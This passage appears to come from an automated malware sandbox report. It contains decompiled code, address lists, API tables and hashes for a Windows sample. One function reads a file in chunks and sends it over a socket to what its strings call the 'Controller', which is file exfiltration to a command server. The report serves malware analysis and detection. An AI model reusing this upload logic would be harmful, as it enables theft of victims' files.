																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46b4d4; // 0x3029ce0
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					E004401F5(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = E0043A504();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = E0043A504();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46b4d0 = E0043F348(_t231, 1, 4);
										E004401F5(_t218);
										_t298 =  *0x46b4d0; // 0x3029b80
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46b4d4 - _t218; // 0x3029ce0
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46b4d4 = E0043F348(_t231, 1, 4);
												E004401F5(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46b4d4 - _t218; // 0x3029ce0
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46b4d4 - _t218; // 0x3029ce0
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043D3F6(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46b4d0; // 0x3029b80
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												E004401F5(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = E0043A504();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}

0x004476b6
0x004476bb
0x004476d2
0x004476d4
0x004476d9
0x004476dd
0x004476de
0x004476e0
0x00447730
0x00447735
0x00000000
0x004476e2
0x004476e2
0x004476e4
0x00000000
0x004476e6
0x004476e6
0x004476ea
0x004476f0
0x004476f3
0x004476f6
0x004476fc
0x004476ff
0x00447704
0x00447706
0x00447709
0x0044770a
0x0044770a
0x00447710
0x00447712
0x00447714
0x004477a8
0x004477ab
0x004477ad
0x004477af
0x004477b0
0x004477b1
0x004477b6
0x004477bb
0x004477bd
0x00447807
0x00447807
0x0044780a
0x00000000
0x00447810
0x00447810
0x00447812
0x00447815
0x00447815
0x00447818
0x0044781a
0x00000000
0x00447820
0x00447820
0x00447826
0x00000000
0x0044782c
0x0044782c
0x0044782e
0x00447836
0x00447838
0x0044783d
0x00447840
0x00447842
0x00000000
0x00447848
0x00447848
0x0044784b
0x0044784d
0x00447850
0x00447853
0x00000000
0x00447853
0x00447842
0x00447826
0x0044781a
0x004477bf
0x004477bf
0x004477c1
0x00000000
0x004477c3
0x004477c6
0x004477cc
0x004477cf
0x004477d2
0x004477e6
0x004477e6
0x004477e9
0x00000000
0x00000000
0x004477e2
0x004477e5
0x004477e5
0x004477e5
0x004477eb
0x004477ed
0x004477f5
0x004477f7
0x004477fc
0x004477ff
0x00447801
0x00447803
0x00447857
0x00447857
0x00447857
0x004477d4
0x004477d4
0x004477d7
0x004477d9
0x004477d9
0x0044785d
0x00447860
0x00000000
0x00447866
0x00447866
0x00447868
0x0044786b
0x0044786b
0x0044786d
0x0044786e
0x0044786e
0x0044787a
0x00447882
0x00447885
0x00447886
0x00447888
0x004478d1
0x004478d2
0x00000000
0x0044788a
0x00447891
0x00447896
0x00447899
0x0044789b
0x004478dd
0x004478de
0x004478df
0x004478e0
0x004478e1
0x004478e2
0x004478e7
0x004478eb
0x004478ed
0x004478f0
0x004478f1
0x004478f4
0x004478f6
0x00447908
0x00447909
0x0044790a
0x0044790d
0x0044790f
0x00447914
0x00447918
0x00447919
0x0044791b
0x0044796c
0x00447971
0x00000000
0x0044791d
0x0044791d
0x0044791f
0x00000000
0x00447921
0x00447921
0x00447927
0x00447929
0x0044792d
0x00447930
0x00447933
0x00447939
0x0044793b
0x0044793c
0x00447942
0x00447945
0x00447947
0x00447947
0x0044794d
0x0044794f
0x004479dc
0x004479e7
0x004479ea
0x004479ef
0x004479f4
0x004479f6
0x00447a40
0x00447a40
0x00447a43
0x00000000
0x00447a49
0x00447a49
0x00447a4b
0x00447a4e
0x00447a4e
0x00447a51
0x00447a53
0x00000000
0x00447a59
0x00447a59
0x00447a5f
0x00000000
0x00447a65
0x00447a65
0x00447a67
0x00447a6f
0x00447a71
0x00447a76
0x00447a79
0x00447a7b
0x00000000
0x00447a81
0x00447a81
0x00447a84
0x00447a86
0x00447a89
0x00447a8c
0x00000000
0x00447a8c
0x00447a7b
0x00447a5f
0x00447a53
0x004479f8
0x004479f8
0x004479fa
0x00000000
0x004479fc
0x004479ff
0x00447a05
0x00447a08
0x00447a0b
0x00447a1f
0x00447a1f
0x00447a22
0x00000000
0x00000000
0x00447a1b
0x00447a1e
0x00447a1e
0x00447a1e
0x00447a24
0x00447a26
0x00447a2e
0x00447a30
0x00447a35
0x00447a38
0x00447a3a
0x00447a3c
0x00447a90
0x00447a90
0x00447a90
0x00447a0d
0x00447a0d
0x00447a10
0x00447a12
0x00447a12
0x00447a96
0x00447a99
0x00000000
0x00447a9f
0x00447a9f
0x00447aa1
0x00447aa1
0x00447aa4
0x00447aa4
0x00447aa7
0x00447aaa
0x00447aaa
0x00447ab5
0x00447ab9
0x00447ac1
0x00447ac4
0x00447ac5
0x00447ac7
0x00447b0e
0x00447b0f
0x00000000
0x00447ac9
0x00447ad1
0x00447ad6
0x00447ad9
0x00447adb
0x00447b1a
0x00447b1b
0x00447b1c
0x00447b1d
0x00447b1e
0x00447b1f
0x00447b24
0x00447b27
0x00447b28
0x00447b2b
0x00447b2c
0x00447b2f
0x00447b31
0x00447b3a
0x00447b3c
0x00447b3e
0x00447b40
0x00447b42
0x00447b42
0x00447b45
0x00447b46
0x00447b46
0x00447b42
0x00447b57
0x00447b5a
0x00447b5b
0x00447b5d
0x00447bc4
0x00447bc4
0x00000000
0x00447b5f
0x00447b5f
0x00447b62
0x00447bb4
0x00447bb6
0x00447bbc
0x00000000
0x00447b64
0x00447b64
0x00447b67
0x00447b67
0x00447b69
0x00447b69
0x00447b6b
0x00447b6e
0x00447b6e
0x00447b70
0x00447b71
0x00447b71
0x00447b75
0x00447b7d
0x00447b87
0x00447b8a
0x00447b8f
0x00447b92
0x00447b96
0x00000000
0x00447b98
0x00447ba0
0x00447ba5
0x00447ba8
0x00447baa
0x00447bc9
0x00447bcb
0x00447bcc
0x00447bcd
0x00447bce
0x00447bcf
0x00447bd0
0x00447bd5
0x00447bd8
0x00447bd9
0x00447bdb
0x00447bdc
0x00447bdd
0x00447bde
0x00447be1
0x00447be3
0x00447bec
0x00447bed
0x00447bef
0x00447bf1
0x00447bf3
0x00447bf6
0x00447bf7
0x00447bf9
0x00447bfb
0x00447bfb
0x00447bfe
0x00447bff
0x00447bff
0x00447bfb
0x00447c0e
0x00447c12
0x00447c14
0x00447c82
0x00447c82
0x00000000
0x00447c16
0x00447c16
0x00447c18
0x00447c72
0x00447c73
0x00447c79
0x00000000
0x00447c1a
0x00447c1c
0x00447c1c
0x00447c1e
0x00447c1e
0x00447c20
0x00447c23
0x00447c23
0x00447c26
0x00447c29
0x00447c29
0x00447c39
0x00447c41
0x00447c47
0x00447c4c
0x00447c4f
0x00447c53
0x00000000
0x00447c55
0x00447c5d
0x00447c62
0x00447c65
0x00447c67
0x00447c87
0x00447c89
0x00447c8a
0x00447c8b
0x00447c8c
0x00447c8d
0x00447c8e
0x00447c93
0x00447c96
0x00447c99
0x00447c9a
0x00447c9b
0x00447c9c
0x00447ca2
0x00447ca4
0x00447ca7
0x00447cd3
0x00447cd3
0x00447cd3
0x00447cd8
0x00447ca9
0x00447ca9
0x00447cac
0x00447cb2
0x00447cb7
0x00447cba
0x00447cbc
0x00000000
0x00447cbe
0x00447cc0
0x00447cc3
0x00447cc5
0x00447ce1
0x00447ce3
0x00447cc7
0x00447cc7
0x00447cc9
0x00000000
0x00000000
0x00000000
0x00000000
0x00447cc9
0x00447cc5
0x00000000
0x00447ccb
0x00447ccb
0x00447cce
0x00447cce
0x00000000
0x00447cac
0x00447cda
0x00447ce0
0x00000000
0x00000000
0x00000000
0x00447c67
0x00000000
0x00447c69
0x00447c69
0x00447c6c
0x00447c6c
0x00447c70
0x00447c70
0x00000000
0x00447c70
0x00447c18
0x00447be5
0x00447be5
0x00447c7d
0x00447c81
0x00447c81
0x00000000
0x00000000
0x00000000
0x00447baa
0x00000000
0x00447bac
0x00447bac
0x00447baf
0x00447baf
0x00000000
0x00447bb3
0x00447b62
0x00447b33
0x00447b33
0x00447bbf
0x00447bc3
0x00447bc3
0x00447add
0x00447ae1
0x00447ae4
0x00447aee
0x00447af6
0x00447afc
0x00447afe
0x00447b00
0x00447b05
0x00447b05
0x00447b08
0x00447b08
0x00000000
0x00447afe
0x00447adb
0x00447ac7
0x00447a99
0x004479fa
0x00447955
0x00447955
0x0044795a
0x0044795d
0x0044798a
0x0044798a
0x0044798c
0x00000000
0x0044798e
0x0044798e
0x00447990
0x004479bb
0x004479c5
0x004479ca
0x004479cf
0x00000000
0x00447992
0x0044799c
0x004479a1
0x004479a6
0x004479a9
0x004479af
0x00000000
0x004479b1
0x004479b1
0x004479b7
0x004479b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004479b9
0x004479af
0x00447990
0x0044795f
0x0044795f
0x00447961
0x00000000
0x00447963
0x00447963
0x00447968
0x0044796a
0x004479d2
0x004479d2
0x004479d8
0x004479da
0x00447977
0x00447977
0x00447977
0x0044797a
0x0044797b
0x00447982
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044796a
0x00447961
0x0044795d
0x0044794f
0x0044791f
0x004478f8
0x004478f8
0x004478fd
0x00447903
0x00447985
0x00447989
0x00447989
0x0044789d
0x004478a6
0x004478ae
0x004478b2
0x004478b9
0x004478bf
0x004478c1
0x004478c3
0x004478c8
0x004478c8
0x004478cb
0x004478cb
0x00000000
0x004478c1
0x0044789b
0x00447888
0x00447860
0x004477c1
0x0044771a
0x0044771a
0x0044771d
0x0044774e
0x0044774e
0x00447750
0x00447760
0x00447765
0x0044776a
0x00447770
0x00447773
0x00447775
0x00000000
0x00447777
0x00447777
0x0044777d
0x00000000
0x0044777f
0x00447789
0x0044778e
0x00447793
0x00447796
0x0044779c
0x00000000
0x00000000
0x00000000
0x00000000
0x0044779c
0x0044777d
0x00447752
0x00447752
0x00000000
0x00447752
0x0044771f
0x0044771f
0x00447725
0x00000000
0x00447727
0x00447727
0x0044772c
0x0044772e
0x0044779e
0x0044779e
0x004477a4
0x004477a4
0x004477a6
0x0044773b
0x0044773b
0x0044773b
0x0044773e
0x0044773f
0x00447746
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0044772e
0x00447725
0x0044771d
0x00447714
0x004476e4
0x004476bd
0x004476bd
0x004476c2
0x004476c8
0x00447749
0x0044774d
0x0044774d
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 004476D4
_free.LIBCMT ref: 0044773F
_free.LIBCMT ref: 00447765
_free.LIBCMT ref: 0044778E
_free.LIBCMT ref: 004477C6
_free.LIBCMT ref: 004477F7
_free.LIBCMT ref: 00447838
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 004478B9
_free.LIBCMT ref: 004478D2
_wcschr.LIBVCRUNTIME ref: 0044790F
_free.LIBCMT ref: 0044797B
_free.LIBCMT ref: 004479A1
_free.LIBCMT ref: 004479CA
_free.LIBCMT ref: 004479FF
_free.LIBCMT ref: 00447A30
_free.LIBCMT ref: 00447A71
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447AF6
_free.LIBCMT ref: 00447B0F

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID:
API String ID: 2719235668-0
Opcode ID: 92e5fc07c61292dce9da1fbd4dd523a4cbef3373096b5782c7914504f2e5710a
Instruction ID: db3f33f972ccc31960696266c8304923ec6ec277b5ade58ccf050fecc9e19cec
Opcode Fuzzy Hash: 92e5fc07c61292dce9da1fbd4dd523a4cbef3373096b5782c7914504f2e5710a
Instruction Fuzzy Hash: 15D148B1908300AFFB21AF758881A6F77A8EF05354F14416FE945A7382EB7D9902C79D

Uniqueness

Uniqueness Score: -1.00%

Function 004064A2, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004064A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E0040498B(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E00404A08(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E0040427F(0,  &_v112, _a4);
					_t119 = E0041733B( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					E004075C2(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E00402084(0, _t304, "[Info]");
					L00416C80(0, _t297);
					_t305 = _t304 + 0x30;
					L00401FC7();
					L00401EF0();
					_v36 = 1;
					_v40 = 0;
					_t126 = E00450880(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						L00404E0B(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = E0042F4C6(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E00402084(0, _t216);
											E00402084(0, _t306 - 0x18, "[ERROR]");
											L00416C80(0, _t297);
											E0042F4CF(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												E0042F4CF(_v12);
												CloseHandle(_t297);
												L00404E0B(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E0040427F(0,  &_v112, _a4);
												_t154 = E004020AB(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = E00417260(0x46c238,  &_v448, _v88, _v84);
												_t157 = E00417260(0x46c238,  &_v424, _v36, _v40);
												L00402F1D(_t305, L00402F93(0x46c238,  &_v136, L00402F93(0x46c238,  &_v160, L00402F93(0x46c238,  &_v184, L00402F1D( &_v208, L00402F93(0x46c238,  &_v232, L00402F1D( &_v256, L00402F93(0x46c238,  &_v280, L00402F93(0x46c238,  &_v304, L00402F93(0x46c238,  &_v328, L00402F93(0x46c238,  &_v352, L00402F93(0x46c238,  &_v376, E0041739C(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = L00404AA4(0x46c238, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401EF0();
												__eflags = 0x46c200 | _t173 == 0xffffffff;
												if((0x46c200 | _t173 == 0xffffffff) != 0) {
													L00404E0B(_t299);
													CloseHandle(_t297);
													E0042F4CF(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									E0042F4CF(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E004020EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					L00404AA4(0, 0x46c2e8, _t278, _t310);
					L24:
					L00404E0B(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				L00401FC7();
				L00401FC7();
				L00401FC7();
				return _t198;
			}

0x004064a2
0x004064ae
0x004064b1
0x004064b6
0x004064c0
0x004064c1
0x004064c2
0x004064c3
0x004064c4
0x004064c9
0x004064d0
0x004064ea
0x004064f3
0x004064f5
0x004064f8
0x0040651c
0x00406521
0x00406524
0x0040652a
0x0040652d
0x00406533
0x00406536
0x0040653c
0x0040653f
0x00406542
0x00406550
0x00406555
0x00406558
0x00406560
0x00406565
0x0040656f
0x00406574
0x00406579
0x00406582
0x0040658a
0x00406595
0x004065a0
0x004065a6
0x004065ae
0x004065b0
0x004065b3
0x004065b6
0x004065b8
0x004065bd
0x004065c0
0x004065c3
0x00406864
0x00406865
0x0040686d
0x00406872
0x004065c9
0x004065c9
0x004065d4
0x004065d7
0x004065dd
0x004065e0
0x004065e0
0x004065e5
0x004065e5
0x004065e5
0x004065e5
0x004065e8
0x004065eb
0x004065ed
0x004065f0
0x004065f6
0x004065f6
0x004065f8
0x004065fb
0x004065f2
0x004065f2
0x004065f4
0x00000000
0x00000000
0x004065f4
0x004065f0
0x004065fe
0x004065ff
0x00406605
0x0040660a
0x00406610
0x00406614
0x0040661a
0x0040661c
0x004068da
0x004068dd
0x004068df
0x00000000
0x00406622
0x0040662f
0x00406635
0x00406637
0x004068ce
0x004068d1
0x004068d3
0x004068e4
0x004068e4
0x004068f3
0x004068f8
0x00406900
0x00406909
0x00000000
0x0040663d
0x0040663d
0x00406641
0x004068b5
0x004068bc
0x004068c4
0x004068cb
0x00000000
0x00406647
0x0040664d
0x0040665e
0x00406663
0x00406680
0x00406695
0x00406754
0x00406759
0x0040675d
0x00406761
0x00406766
0x00406772
0x0040677d
0x00406788
0x00406793
0x0040679e
0x004067a9
0x004067b4
0x004067bf
0x004067ca
0x004067d5
0x004067e0
0x004067eb
0x004067f6
0x00406801
0x0040680c
0x00406814
0x00406819
0x0040681b
0x00406899
0x0040689f
0x004068a8
0x004068ae
0x00000000
0x00000000
0x00000000
0x0040681b
0x00406641
0x00406637
0x00000000
0x0040681d
0x00406820
0x00406825
0x00406828
0x0040682b
0x00406832
0x00406835
0x00406839
0x00406841
0x00406842
0x00406845
0x00406847
0x0040684a
0x0040684d
0x00406850
0x00406850
0x00406859
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040685b
0x0040685b
0x0040685b
0x00000000
0x004065cb
0x004065cb
0x004065ce
0x00000000
0x00000000
0x00000000
0x00000000
0x004065ce
0x004065c9
0x004064fa
0x00406503
0x00406508
0x0040650f
0x0040690f
0x00406911
0x00406916
0x00406918
0x00406918
0x00406918
0x00406874
0x00406877
0x0040687f
0x00406887
0x00406894

APIs

Part of subcall function 00404A08: connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
GetFileSizeEx.KERNEL32(00000000,?), ref: 00406524
__aulldiv.LIBCMT ref: 004065A6
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00406614
ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0040662F

Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18

Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11

Strings

ReadFile error, xrefs: 004068D3
[ERROR], xrefs: 004068EE
SetFilePointerEx error, xrefs: 004068DF
Uploading file to Controller: , xrefs: 00406558
[Info], xrefs: 0040656A

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
API String ID: 1319223106-2190262076
Opcode ID: 048919d7fd5a81af040df54411573ec8a5145bc9ecf892f934884ad1f66b66ff
Instruction ID: 173749a7d42c5eabba2dba03019d43edcf8f50480dc145d367e539a2da324ad2
Opcode Fuzzy Hash: 048919d7fd5a81af040df54411573ec8a5145bc9ecf892f934884ad1f66b66ff
Instruction Fuzzy Hash: F5C16B31A00219ABCB14FBA5DD829EEB7B5AF44304F10817FF406B62D1EF385A449F99

Uniqueness

Uniqueness Score: -1.00%

Function 0043F5AB, Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043F61B
_free.LIBCMT ref: 0043F631
_free.LIBCMT ref: 0043F642
_free.LIBCMT ref: 0043F653
_free.LIBCMT ref: 0043F66A
GetCPInfo.KERNEL32(?,?), ref: 0043F6B2

Part of subcall function 0044B0F4: _free.LIBCMT ref: 0044B15F

_free.LIBCMT ref: 0043F85E
_free.LIBCMT ref: 0043F871
_free.LIBCMT ref: 0043F87F
_free.LIBCMT ref: 0043F88A
_free.LIBCMT ref: 0043F8CC
_free.LIBCMT ref: 0043F8D4
_free.LIBCMT ref: 0043F8DC
_free.LIBCMT ref: 0043F8E4
_free.LIBCMT ref: 0043F8F2

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 7bbae23d08da65fe13313e8619d087693854e34d1332be766e476d8f762dca74
Instruction ID: 1e5099d4cf7091294613e4cd6a63c328f2291409cd47a3a75e98f44bfb697c1d
Opcode Fuzzy Hash: 7bbae23d08da65fe13313e8619d087693854e34d1332be766e476d8f762dca74
Instruction Fuzzy Hash: FEB18E71D002059FEB15AFB9C881BEEBBB4BF08304F14407EE955A7352DB7998498B68

Uniqueness

Uniqueness Score: -1.00%

Function 00449546, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0044958A

Part of subcall function 00448782: _free.LIBCMT ref: 0044879F
Part of subcall function 00448782: _free.LIBCMT ref: 004487B1
Part of subcall function 00448782: _free.LIBCMT ref: 004487C3
Part of subcall function 00448782: _free.LIBCMT ref: 004487D5
Part of subcall function 00448782: _free.LIBCMT ref: 004487E7
Part of subcall function 00448782: _free.LIBCMT ref: 004487F9
Part of subcall function 00448782: _free.LIBCMT ref: 0044880B
Part of subcall function 00448782: _free.LIBCMT ref: 0044881D
Part of subcall function 00448782: _free.LIBCMT ref: 0044882F
Part of subcall function 00448782: _free.LIBCMT ref: 00448841
Part of subcall function 00448782: _free.LIBCMT ref: 00448853
Part of subcall function 00448782: _free.LIBCMT ref: 00448865
Part of subcall function 00448782: _free.LIBCMT ref: 00448877

_free.LIBCMT ref: 0044957F

Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 004495A1
_free.LIBCMT ref: 004495B6
_free.LIBCMT ref: 004495C1
_free.LIBCMT ref: 004495E3
_free.LIBCMT ref: 004495F6
_free.LIBCMT ref: 00449604
_free.LIBCMT ref: 0044960F
_free.LIBCMT ref: 00449647
_free.LIBCMT ref: 0044964E
_free.LIBCMT ref: 0044966B
_free.LIBCMT ref: 00449683

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
Instruction ID: bc7df33f33a806a4e6538402b94214bd38d1e854ce5dbc401830de06ad29eac0
Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
Instruction Fuzzy Hash: 46316B32600601AFFB21AA3AD845B5B73E8AF01354F21441FE659D7251DF3AAD509B2C

Uniqueness

Uniqueness Score: -1.00%

Function 00448880, Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004488C8
_free.LIBCMT ref: 004488EC
_free.LIBCMT ref: 004488F9
_free.LIBCMT ref: 0044891E
_free.LIBCMT ref: 0044892B
_free.LIBCMT ref: 00448934
_free.LIBCMT ref: 00448C12
_free.LIBCMT ref: 00448C1A

Memory Dump Source

Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 840c13727cd2f055df9e3f45250c10aa30f0a59d5295323c5921bb3661981254
Instruction ID: 0fd459aec3f5e05b68cc896b93c3b77f39616f80babc804ed9fa449a4b9e12b5
